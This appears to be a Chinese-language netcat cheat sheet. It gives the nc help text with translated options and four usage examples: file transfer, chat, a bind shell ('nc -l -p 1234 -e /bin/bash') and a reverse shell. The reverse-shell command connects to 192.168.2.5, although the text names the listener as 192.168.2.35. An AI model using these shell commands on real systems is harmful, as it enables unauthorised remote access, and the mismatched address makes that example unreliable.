nc (netcat)

root@promote:~/test# nc -h[v1.10-41]connect to somewhere:   nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port]options:    -c shell commands   as `-e'; use /bin/sh to exec [dangerous!!]    -e filename     program to exec after connect [dangerous!!]    -b          allow broadcasts    -g gateway      source-routing hop point[s], up to 8    设置路由器网关  最多设置8个    -G num          source-routing pointer: 4, 8, 12, ...    来源路由指向器 4的倍数    -h          this cruft帮助    -i secs         delay interval for lines sent, ports scanned    时间间隔 传送信息以及扫描通信端口        -k                      set keepalive option on socket    -l          listen mode, for inbound connects    使用监听模式    -n          numeric-only IP addresses, no DNS    直接使用IP地址 而不是通过域名服务器    -o file         hex dump of traffic    16进制保存文件    -p port         local port number    设置本地主机使用的通信端口    -r          randomize local and remote ports    随机指定本机与远端主机使用的通信端口    -q secs         quit after EOF on stdin and delay of secs    -s addr         local source address    设置本机送出数据包的地址    -T tos          set Type Of Service    -t          answer TELNET negotiation    -u          UDP mode    使用udp协议传输    -v          verbose [use twice to be more verbose]    -w secs         timeout for connects and final net reads    等待连线的时间    -C          Send CRLF as line-ending    CRLF作为行结尾    -z          zero-I/O mode [used for scanning]    使用0输入输出模式 仅作为扫描用port numbers can be individual or ranges: lo-hi [inclusive];hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

常见的用法：
1.拷贝文件

从192.168.2.33拷贝文件到192.168.2.34在34上执行  nc -l -p 1234 > test.txt在33上执行 nc 192.168.2.34 1234 < test.txt

2.聊天

192.168.2.34和192.168.2.35在34上执行   nc -l -p 1234在35上执行 nc 192.168.2.34 1234

3.绑定shell到端口

192.168.2.35 绑定shell到本地端口  192.168.2.34主动去连接在35上执行 nc -l -p 1234 -e /bin/bash在34上执行 nc -vv -n 192.168.2.35 1234

4.反弹shell

把192.168.2.34的shell反弹到192.168.2.35上先在35上开启本地监听  nc -l -p 8080 -vv在34上执行 nc 192.168.2.5 8080 -e /bin/bash -vv